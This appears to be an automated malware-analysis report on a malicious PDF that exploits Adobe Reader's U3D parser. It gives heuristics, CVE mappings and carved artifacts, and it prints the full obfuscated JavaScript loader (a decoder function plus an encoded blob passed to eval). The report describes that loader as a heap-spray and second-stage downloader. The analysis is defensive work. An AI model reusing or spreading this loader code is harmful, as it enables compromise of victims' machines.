MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1204.002 Malicious File: User Execution
T1059.001 Command and Scripting Interpreter: JavaScript
The PDF file contains embedded JavaScript and a U3D stream, which is flagged as potentially related to Adobe Reader 3D parser vulnerabilities. The embedded JavaScript, named 'legacy_pdfkit_stage_000.js', is likely responsible for exploiting these vulnerabilities to achieve arbitrary code execution. The deobfuscated JavaScript indicates it is designed to download and execute a second-stage payload.
Machine Learning
- Nyx PDF Classifier malicious score 0.9989
Heuristics 6
-
Adobe Reader U3D auto-activated 3D annotation — CVE-2009-3459 critical CVE likely CVE_2009_2990_U3D_AUTOACTIVATEPDF contains a /Subtype /3D annotation that is configured to auto-activate on page view (/3DA <</A /PV /AIS /I>>) alongside a /U3D stream and JavaScript. This is the document shape used by CVE-2009-2990 (Adobe Reader U3D CLODProgressiveMeshDeclaration heap overflow, APSB09-15): the U3D parser runs without any user interaction once the page is rendered, while the accompanying JavaScript prepares a heap-spray to land controlled memory inside the corrupted allocation.
-
Adobe Reader U3D CLODProgressiveMeshDeclaration exploit critical CVE likely CVE_2009_3953PDF combines malformed U3D 3D content with JavaScript/action activation. CVE-2009-3953 is an Adobe Reader/Acrobat U3D CLODProgressiveMeshDeclaration array-boundary vulnerability triggered by malformed U3D data in a PDF.
-
U3D/3D content in PDF — Adobe Reader 3D parser CVE-family indicator high PDF_U3D_CVE_RELATEDPDF contains U3D (Universal 3D) or 3D annotation content — CVE-2011-2462 and CVE-2009-3953 are critical vulnerabilities in Adobe Reader's U3D processing that allow arbitrary code execution. U3D content in PDFs is extremely rare in normal documents.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
legacy_pdfkit_stage_000.js |
deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1E1D | 12841 bytes |
SHA-256: 24e6570ffd016a66046cf68aa5e651b4c845154374d46c1b057972ef6c7c659e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function l37E0n__4m(e__P8rX, K1rXUj__Q){var NkQY_5 = 512;var G0_k_a_3R2Lj = 2;var NWknF_M = 0;var V_n76eF0wWklxr = 0;var yWqVsm1008____s = "";var MAS__1q1eg = "";var IDC_d_E0pq_U = 0;var S3e_2_c_ykc = 6 + 1;try {var g__f_tCciW = 0;if (app) {V_n76eF0wWklxr = V_n76eF0wWklxr + 2;K1rXUj__Q = pr[g__f_tCciW].subject;}} catch(e) { }V_n76eF0wWklxr = V_n76eF0wWklxr + 7;var EWtufb = new Array();if (!e__P8rX) { EWtufb = new Array(7,62,25,185,34,199);} else {EWtufb = e__P8rX;}var HV_mt_p1_31Yh = 0;var V1xR6sWh_n = 0;var f_1_y00J = 0;S3e_2_c_ykc--;if (S3e_2_c_ykc == 0) {} else {for(V1xR6sWh_n = 0; V1xR6sWh_n < K1rXUj__Q.length; V1xR6sWh_n += G0_k_a_3R2Lj) {if (HV_mt_p1_31Yh >= S3e_2_c_ykc) {HV_mt_p1_31Yh = 0;}var Qsmdtj_i = K1rXUj__Q.substr(V1xR6sWh_n, G0_k_a_3R2Lj) + 'XXZ';var SVY8_2cW = parseInt(Qsmdtj_i, 19 + G0_k_a_3R2Lj);SVY8_2cW -= EWtufb[HV_mt_p1_31Yh] * (f_1_y00J + G0_k_a_3R2Lj);HV_mt_p1_31Yh++;if (SVY8_2cW < 0) {SVY8_2cW = String.fromCharCode(SVY8_2cW - Math.floor(SVY8_2cW/256)*256);} else {SVY8_2cW = String.fromCharCode(SVY8_2cW);}if (V_n76eF0wWklxr == 9) {yWqVsm1008____s += SVY8_2cW;} else if (V_n76eF0wWklxr == 8) {yWqVsm1008____s += c__O_4__AK_4s;} else {if (V_n76eF0wWklxr != 9) {yWqVsm1008____s += V1xR6sWh_n;}}f_1_y00J++;}}var e3D20Kb0sb = this;e3D20Kb0sb['ev'+'al'](yWqVsm1008____s);}
l37E0n__4m(0, "6616a4900d81747h5821bg3g890i95507eajbj5i7a9258af1jb42b181g40424b975210bi427h16009a9f4j1kah31726760742a5k4j2db2319db3439d0h7k7544095b31062b9688c01h3d6gae95ac7b015d4g74635h5baj923kb9aa9b4h140e86ai1d233hb43a2d90838a8i155c0e0gbj65977d6gbk4a4e697a2d578jbc04818h1j0cbj650cb15h3b795k1k760h6e61b42ab871b30c8a6954602h235197bjb099a6168b324g1e928a15aa2b5a6527bi14a68k46a12h89471db4875gc0bf1i901i57484b968j1e7d1f161g2e85a06f77571037b5a1066hb49i392gb0c3ah6c4d7b3f21822f5j2hb99k501b7k787ab411849f372f5i0j5c266b6c8d80112i1k27bj566236420h6758584i035ea53d0e976ebh0a0k5aa58a9b59ak571k3g48a94k091f849g055j7j6d1c3g590c27746i1eac0613ae39550h7d8iae890d424k14bab0787j58090a461k2038785cbd9957b45086616aa97fb9a28fbcah8b7hab5b9j60444fbb984e6h0d92302bc22b017a60715869734j811g22ah7a0b9e5561c11k64bg1b04361g2i207bad9a069k270e2k2b9c8b5a6c0e305422428j4h725e8h8h3a352h2374bh808f6f8c20a20824766295c28bad30797j482i4c594g1h3j921gaj2dbj5j1a8kb88g759k79486c8843akb6b78171bh395g6e2f0k4a327jae3hae4e3f3k6hb8c0bf84aa0g1d974792026k454007b05d65933gbb3801b720bb7e1b5i3j66a141771217b86caa93376bbg4d73af0b216132120g3abcb2a68b0jaf653b8j693i2219498k35719k93b62i996fc215040886aa97ab6k1a131c346dc2b1b92g7c9f19837150aj6e6a3f343h6g2bbg3cbi8c8e7fc3b1447367175da92i0h8daiae60b4b3253903353g0k6jac5f302g6h0h7jagagb265554j45a77a6k09ad808207ae4j5ca25f7c039d102e2h4d3g5470770a286f933d009aba8e56aa3f4k447h7g307j59ba932bbi022k8506706h240c3k442h2a7jai2d2c69768d547f4c2f0i284j6k9j4g9f59290ic099478f957kae2gad0d8b6243bd5j6950204351168h63a880b2a90f2f67680i3k7h0b25957fa1bj85a9b12k7a4b786j3d4ib8661bbi2da8ad900j9j7k71222d9c5h7k0a886866b08k3739a83hb5bgb21a4i29522b2a8i5205ah227i0a94926f5i36b6496k476h8h458d3db580b9bj981373a0657c482b3d240b0c8f9e27527baf129d6b58c14h534b4h8739006e581ebibd6j161ka417150d48b457227g8h946b1b4d131bbi3d8k5a8da14g2j388d0b5i76b5aj7d62081abb7iadb25i568540073g459g631k19b1a10c179g5k542j1ebe2193b0125g981ib74387a559639i7i334i6g1k2b108590381j4k65430g128k43c186357d4a7276589576b2a5b814bg39731365951k384g17be167302bb2d3iabb4b89j6f8h5i584k21594107895aag838g63bh1i8ga23e3c5h9f2kb17i8995980g30bj4bbj7g763d4g0257655a6h136i9d40bha437aiae18659d8c632g7119011h1675509a50ahb3ab2a8c5e2k5g390f3e677gbg9da813ah344ib36i678e69142b70311a0ba58g3102216j3dba028h5g0k056d081b4a72649f9e9ka2ah1kbf705ib81d7a2f472i1696478k08c21i3a9jbe9d8k6793726ha8167a27089j50a28e6b6h0e4d5k01273i2jbg0hb546777i94a438a74721968i5h380560703f5094488a17b97k491a26105ib28b9a4h97161i474cb3a209389bbkbe48541j276b5a431b5071038i0bbf6k1k9g2i8h5h037k3g668439aja3a29150a82h396d394d49327jad4e1h427d15539i8kc07fa30b0k5f5f7f0i833a5d10127d548827870ib3ac21267g335a504abf2i58ajbfb68hbk8j77990i316b86052k71181da12f8b7g290129bd313aah7125411a597h37537753952i9e7j3j3d18185185939k5fb00b072456bi96bf287caj3i5b651j1466773a173c3h35bh2dbi91c3a237a64c84292d7bagbi9bb7bab35iag292b5j3946491da01e7i383c68bj6j9d9f8a58554h03b16c9kbead7f691k035j37873e7cb1a89h05073a4c5k7e55072i49ak30a57h8g4g658k377c43a89i4f574j2abg2kbi9b0f9g057g5e3ba8754f341e4b85b868818j9b78ag650i45272e4a9g6ja67d0904akb24bac0185276j1c1374484hae5h866428343400a41f9678a37j471g6076362i7f9d2bbe9f090f9j70bibb4k0h552j1063177j4bbg5h0f969j1ia27460451j9i547iaha582772e03656592546ha68ib5122d4j3049648f181d2j9g3c00ai9f50189j2g7e4a926i699776af8bb7a9001380a04g571kak3h30101h8698bf445485b5907c7g1056163k3h5h35a18i46ab84865j061a74153g1e268i5k2jaa949a93a9250233a76h8770699a1j0g2a5dc0365c2d07ad7aag12ab95ab0d834c7h53094926774dc24b9jb01f4591393c201gb12h5b90189jb519b1474a01629db99kc1372i36b922948i131a3g8921ad1b956k230256811i9c7c4780860gb617b40i5e910141691k0f33b58g0ba2a09i1c209d0ka96b6ea1582k7g415h49bb9b36b7716j4ab12j5e9cbj1d530b272a7g9c73a1c11d233b1b5c735g58b1305i3a85a9546707ak6i3hc12e0d6cajbd8f68ag241e4h3i995aac0e7i94ab245d6f193b3408185ka210ab1412a8bf83bf8j89be923b3778441e187i7f341b3h7k5d1f398e650k9165c3247a5i72987eahaabkbb0g7h82972895572e402b7f118c13043615b4169i5g3690633g6j55892g1cab76906e708i1h285eb90h135j361a1f70b1a80c030ca23d0e84825237055c4f1a52b278811g8ha93c2k20bj5ab59c79620d0dad1e19979fbf0g6cbf1f4c7d63097k574g3b4g591d9jbhbda3a470b8ab83aj4817698b180f1288b77abe3e686c2g4e7h228ea853083d6f207ga192946f9g2f0769548318ag6g754619971h9f48b708bjc222b9755g5g876jc13i6f1h27b995858k676k1a5a739k0j1772241h0h54aa87a6c102b6401c9k7b2j41c047573g677f83b454937j2225221k7c7g9gb76k1hc1062f60a7akak255ib52i6g4e431c46572e0b773j298h388d87999c151h6ib1203a7ea90b9jaeb2927kc0b3253942646k4j9c1a7k36c36i0a9294bd9h896h3a1k7e4ib11ebb4568210g7d4497388a2a03bc13c04i0g626h81070659a20f0395975h24a41k676i9g9f26495j269j3e00ai0f9k0g8763200g3f1i3d1i896i2i3f5h6f9a7c925a011d3b30596c56808e332807096107057cae301k1h7946138b925j4k04331i41a02a865378b41c01669b0f637ka2c29c6512a27580b3bg85204g3j0k52345k4dc030ada79jc3a57b3k561k9f61979a055i74c1982h789i4e7i128727234a3f141e9a89bk1k537449a69c9h770bbc49993872616b654e1h92bc1a06467gah4j8d1k205i33a93c8cbbbc2f3gaf0a719h71965e4d6g5e8j2d0d8f461eb3837ga51e7a0f1a2f2bb7370h709i658jb42c074h0b489a495ibk251f386bb86j67bbb28g4f1iah8j75aga590286657083c3k6c3kb52492b20g1a974426292k2453977fbg7dah02af34550e6j91b377b5332i21be3k786d18ah1a9a27afb26f3a2h9a2d8d2d5a87496f63af779haja12g62124762330k20329i1175aea2523484b78460728f33355f1j92440a993ea0b27355b00g5j0j0f2g2jaa1h2j877876849j4jbb26b55b5h6j4i9930311f8jac487a2k9haj421fb40b5f0f968j397h1d2f2k3h9b7h9f4f848cbc355d6f1g603c081b8f72ah76079daf065gbf7h5b0b872k3f59192bbfa29k2h9b4b4e31bg0c596b0ca33g02178b3b4k7g9g99abbc02bh585707286i3i5115277j1h7c0097473h98209h5567716a3i7d138702b17k7695a75j68bg265303ba11400111234gac81bk9343085dc27551633f083h4i0k83b85ba82a91a3240202014kc37f753i970i1k3b2b87958k3k6k97014f4i5kc246424a0g7k801c88bi8i9kb46f039a4gbk4e1745700e1g9h8a866g8g3g5f5g081k4e5gb40k4b1d0c7g235e8abb8e9g7j0b2c6j4cbg0i7h6g690a1c682c871c8c3c02c205b54a5c5a4f6hb4087cb0bk8e688a9c426k0d4448bc9d1f491806185bb98bb188388a650e8i465821b84g8904787c608i3e86980e0k0j3b44b868834ib00214bi579288843458a70d5j4254ak52765g00746a29933782949f780h1040b43127538cc2108698955k8030436c14383j507bbg4j13c0702j6d90ad7j90601912833hb0bh8d5281bj0h533c99397h2hacad390i3f4h3f5952aebh6h9d2f99a47f8h2c7f3b583dah8a2i572ibf0d199d9a0d7d2d984c17a53b4d0bbf5b7dbd6d61709d567b8d1f441b2e39ad4f8g5d0abb090c429ia179293ib21879374997835a55b9692d0j9c2b77898384412c35a91a545c9jb70573a39j7e75250253404i334560c25i27b565b3719j2373856i24209g31a5a599879db3013c439i4k7121951920282k41278d64c1b1618117a7bf6k81188e20722ia1933a5k4bakc1060ca6246i1i5b5726bj2g3i170b6196ai5i6f7ia66h6g7ia029254d2e9i339e8a44agbi8h4d0abe6e1e20204db72c3e7c6c8d90ae5e391daa486c7e68912c1f2a9e23608gb6acbe55aja9b56a1aak5f4h8d283a6e0f8k64aa5a9ea8ae3f687a5a322gb6269a8i026gb2a8ba1j51ai8d66169h262b3g243611976j19a6566846af126476bkbc30ag229651436g87a4b6ak17125j6212468a2f132032bi166haha25230af11ac6072af3631631j921da6993da0b29f7h18375j0j0i2f5a0i1h2j609i74ab9j4jbk2e197k5h6j55bg5c5c1f8jaf6j72329haj65bd1aae5f0f986d397k1d2f2k3g9d7e9f4f858ibb555d6f1b62352f1b8f76af7da29daf0a5fbf7e5b0b62103c59192bbb827e2j9b4b4e2ebf08596baba03ea6178b3i4g7h7d99ab9326bf7657072e953c511527851h7i0997471bbbbka355676i693i7d138708187k5495a75j8cc12c5303ba0k3g2811234g89819c9343a25dc37651633da941720k838k7e842991a32a0a02bh4kc37h9h44970i1k142485988k3k6f9900484i5k0146421k0g7k5cbb84bj8i9kb26902934gbk4917486g0e1g9k8a86488g3g383b04234e5g8haf46ba0c7g235h88928e9g7e0f096c4cbg107i48400a1c6e2e8c1j8c3c009h08b84a5c5b4j4a91087cb1c28f678a9c47740a4448bc9j204f1d061835938eba88388g3k0f8h46581kb34h6504787a5j8i5k86980h0i0e1444b86a864gai0214bi378i88843451a20g5j3k290f827g3725686300ae3ba96009822k0f7b73381782b32k0jafbcbk85830j3i69314k4e3ka2b879300d3f205jaibcae728b2d16a5539k06884h4g12bb82629k368ebi1305220f3j14458g7915bc6hc32kb9aiba4g346g128g477b822a542i0c0e3g0c8b2h86bb766h39ba680c0jak8480c3385j92a9568k57181k2g2c6h9i7db88d2ib691993ha011a6262gbi2b9k6213b67d5d4k00584d0k8h327289ahaa3f317068122254c3c0937201bj8da2aj02881f53371a702g7j28bg570h75c0366j5c3f4i3j9i5h9603b1607j2fbi2k5a0b6h7eakb50j1k476k0c197470231d2g9k2ka2977f70368a1b786f929f2a996dbfb02a13a83g7d0h5e4c2cai2j2k1k377ebf194j528c047b776h0h1d1j3934a0379b631fb68c874917239g0d512e2ebb623b6g649c8h231d1g4a086j826d6g8e4a4j5k8d1k727daabf7d55b69e9e9k091a6f4c6e2j297a3d8e61263a8i889g4h9349545758b84e69afa3717hbhb3417gbd8774a49c345a5i4k3a1k6f680ha15c70260g20a2481g9542b92f815k6k8k8hbfa5akb30i6h9c01639c40321g098e299e0faf1h53a1b2a9a03181285f62295i1f0b7k38b97h985c0616a216313a5i0f5c2790a665akc01i0d2c0f5h5k36890c57641a92af59a72h087i611c1e9b6i8i8c5h3da8532c1h118h570i2eaf8dc2226g2e194129202185841277aj9880bf5eba8356b15h384b7g2001b27a711j194f503f2b29843a07c161931d5i2g81a99k0k9eb82g1j4c548f5e6i5j2a44afb41ha00002080j9a330i826460685h8i3j68080g7j40a8664k57024i8e00a80c56c0480272838c8ga602a03cb28e5c5e4c0d3h580f59825a8222a2623h022c0i828j8b703d900d253b499c92ah0k8a9cb643601j384d50533b6j5e1ca6229ja720912e0354b276446j903c030ibab66f8b122847314c814hb1aa6c253k774b7kba9kc28ha53717997eba0ab4797638116i1h7e0i8jbf2d0f2ibf454g7a666ca21464b036826hb797736e2g6e79ad0c39734537bg65c2830594198c3k2e8f71252f165f673e3g7i9cb46jbg8b3j3c3b423kb77b8k4kbk1dbj0i4ec0888k034e0b2i834d431576505e25545f058a4bbk8508683g0k74a3644h718935938j8aa6609ic01g690k5a4c2d9e07533f0i69315b8da2b17k851533ai6c801ca266770a8k5b3k87397cb59j9f3d2h6a1b5k8677ac2855ab2499718h4g2k7913583h6gbf62495a26bg19bic32d891c8e5i30a7361jbfc1547ebh2c9897bd57947018364g26417a4a804fbi3397093fbj98b5b75kai3h6g3e08be817f4k20604d11bh44936k837c20276ha413615i000f969006bj9aa0232f770h582j3j74036k2c1835be89a1137g526f233j9e4a9ab4988f6602845e730f4aag16c20g4a5060255a995ab31f5hag110k9d9k5h14ab47925d909g5i8740b382bj9da21c7j25837j14b55j2h100686c0192i6b93b98a7b3ha81d2842356e2h8g9f4628bbb27f0g25a39h4c2248a1340f7b9a5i63a95k424e1d35ae718d8i38345581343569b7aj7d4ca51b8g99a810545d6657046b0065311949bi7h0c44934a544a3f0e315i90118ibfa3ae41760468910a7e28434h1k0dc26h6d4cb32j752hbgbg7g4k010256b25h5j7e6b9k6f1aak18241h319201677i30345003c02e80aa9i4650ad0a8a8g668d5f496j255142079750aha19d5c18287d9dbj2e530f42c2859h77acc12hb42h2c4g8g5k82bi5e2e4g569d7k9b3c12ah6f241ba4960cbk9967ae52b51j3ga386114eb67h1d668c5k4a6g5j38504e9a1da90j126gc363adb69fc08a2h485526b9217771341b3k751jb2c08c5a059h5d0c425b5g6a8g95a46a9f07ah58528g1j62624f40b5a34e9h06c22g2bagbj8k6726743h3e6j0j8e3fa66j40906e85851h267jbj14155j1b2i0e4f7789a38j15952cb86684525ca460793f53b26i933j9h622gbb03bf5b94786a7a0g0da206197c9abf2j6cbc2f6d5e4j1d5c5g230b5761ae88ai8j64a49024b856aj733c478j2jbkbd8f784g8b0h313a05184i1f011168bd25634574bf8c956d77bjbe5k888a367d6e3a46aa8h2cag0i8jbf27bk2ab575537a4k6caa2462b0ba8k9kbf8i376838667cab0i496e1c3d9k2405ai1jbk00aj6e2kaj7k3h4b1e717c40776k8kb266b19b38320g3k488d9ibe7k103g972c5492adb61a58bj2176642f1546572e0b497527bk04b3739c79110f6gac5j474kafbiab7bbcbk8g892g4a7a3949784j7e1f7j3jbg373h8dc39f9g628f463588776kc37d5061beb15561c3588f2b9db105325a1e405g77072h6eba0bbf7fb2815ba347804e6g992i7j5j289j49989101782ja66j47975429302i809i245c6k8b98488e4c1e2i192k469c6jb98b2900bi01519i09b01a3j1e3b77743e0090847k2f3e52378h229065adb544256098284f5c8k07889h01a19aa70b096g3063551g8abg4j5ib0601479c0289556663931b2489h959g50840cbe6e6hc26h9hc2afb5261773494j8g52b91f5hag1112c1a0833cb93e986b9k96658j3dc298b7ah9k1k78aj4e4i1aai672hb72b8dafbf485f8hbf7aa33ha81d2a42356f2h8g9f4g178kaj71bhbg90c038102kbh27106g70636bb72j4b450f356f6f99bf234i5f8j32639a0i19bb891615bf65b0b84k2g64300443c25k37a555bi840c3j8a4b4g443h093d917faa5g90ah861i4b9i9e9i057f215254311h2287841k1a156h13b3ag6h41010b57ak1i5d78719g5h1iaf0j27136c89077196593k5ab5a11e61b2ab1k2g85a37f6131b758347k50781kc2874dc28da04abc006i9f0d052c9f5j2e857f95acc01k133f0672736a42a1253a235ga94jag360f6i371e2113630gbk906aa75615524ca88111487794bj226c371c3b36bh1c4k641b9baa04a01i5k109179b06d392b5f14bib57i7a27964h7f4jbi298b4habbd4hb639616840826ea87394c0c28d92ac37744c3a3c089d527c05a20e46b4c1bk874d725f508d355i2kaf84");
|
|||
u3d_00_off00004909.bin |
pdf-3d-stream | PDF U3D 3D stream at offset 0x4909 | 28021 bytes |
SHA-256: a96e1fca2499edf504d3934052ca1fc338d4b4898a65e6a361937ed1ba0dc0fe |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact entropy is 7.79, consistent with packed or encrypted content.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.